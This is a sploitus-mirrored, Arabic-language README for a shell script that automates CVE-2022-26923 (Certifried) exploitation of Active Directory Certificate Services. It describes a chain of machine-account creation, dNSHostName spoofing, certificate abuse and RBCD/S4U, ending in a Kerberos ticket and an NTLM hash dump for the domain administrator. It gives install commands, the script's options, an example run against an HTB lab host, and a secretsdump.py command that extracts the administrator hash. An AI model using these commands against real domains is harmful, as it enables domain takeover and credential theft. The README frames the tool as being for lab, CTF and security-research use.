## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ELIASDEKINIWEEK-CVE-2022-26923
# CVE-2022-26923 – استغلال Certifried (إساءة استخدام AD CS)
أتمتة استغلال **CVE-2022-26923 (Certifried)** مما يسمح برفع الامتيازات عبر إساءة استخدام خدمات شهادات Active Directory (AD CS) وتفويض مقيد قائم على الموارد (RBCD)، مما يؤدي إلى تفريغ تجزئة NTLM لحساب مسؤول نطاق.
> ⚠️ **للاستخدام التعليمي فقط / مختبر / HTB**
>
> لا تستخدم في بيئة غير مصرح بها.
* * *
## 🎯 الوصف
يقوم هذا السكريبت بأتمتة سلسلة الهجوم التالية:
1. إنشاء حساب جهاز تحت السيطرة
2. تعديل `dNSHostName`
3. طلب شهادة عبر AD CS
4. المصادقة بالشهادة
5. إساءة استخدام RBCD
6. S4U2Self + S4U2Proxy
7. استخراج تذكرة Kerberos لحساب `administrator`
8. تفريغ NTLM عبر `secretsdump.py`
* * *
## 🔗 الثغرة
* **CVE-2022-26923 – "Certifried"**
* تؤثر في بيئات Active Directory التي تستخدم AD CS
* تسمح بانتحال هوية وحدة تحكم النطاق عبر شهادة صدرت بشكل غير صحيح
* * *
## 🛠 الأدوات المستخدمة
* `certipy-ad`
* `bloodyAD`
* `getST.py` (Impacket)
* `secretsdump.py` (Impacket)
* `openssl`
* * *
## 📦 تثبيت التبعيات
root@kitploit:~
pipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl
* * *
## 🚀 الاستخدام
root@kitploit:~
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [خيارات]
### الخيارات المتاحة
root@kitploit:~
-d, --dc-ip عنوان IP لوحدة تحكم النطاق
-D, --domain اسم النطاق
-u, --user مستخدم صالح
-p, --pass كلمة مرور المستخدم
-c, --comp-name اسم الجهاز المسيطر عليه
-C, --comp-pass كلمة مرور الجهاز
-a, --ca-name اسم هيئة الشهادات
-t, --template قالب الشهادة
-f, --pfx-file اسم ملف PFX
-H, --dc-hostname اسم مضيف وحدة تحكم النطاق
-A, --dc-account حساب وحدة تحكم النطاق
-i, --impersonate الحساب الهدف للانتحال
--verbose وضع التصحيح
-h, --help المساعدة
* * *
## 🧠 مثال (HTB Certified)
root@kitploit:~
./CVE-2022-26923.sh \
-d 10.129.1.39 \
-D certifried.htb \
-u some-email@example.com \
-p 'Ch4ng3m3!' \
--verbose
* * *
## 🔥 النتيجة المتوقعة
في نهاية التنفيذ:
* تذكرة Kerberos `administrator.ccache`
* تفريغ تجزئة NTLM لحساب `administrator`
في حالة وجود مشكلة مع Kerberos:
root@kitploit:~
KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
-just-dc-ntlm -just-dc-user administrator \
certifried.htb/some-email@example.com \
-k -no-pass -dc-ip 10.129.1.39
* * *
## 🧬 آلية العمل الداخلية
root@kitploit:~
إنشاء حساب جهاز
↓
تزوير dNSHostName
↓
طلب شهادة (قالب الجهاز)
↓
المصادقة عبر PFX
↓
إساءة استخدام RBCD (bloodyAD)
↓
S4U2Self + S4U2Proxy
↓
استخراج تذكرة Kerberos
↓
تفريغ NTLM عبر secretsdump
* * *
## ⚠️ إخلاء مسؤولية
تم تقديم هذا المشروع لأغراض:
* تعليمية
* بحث أمني
* مختبر شخصي
* CTF / HTB
يتخلى المؤلف عن أي مسؤولية في حالة الاستخدام غير المصرح به.
* * *
## 📜 الرخصة
MIT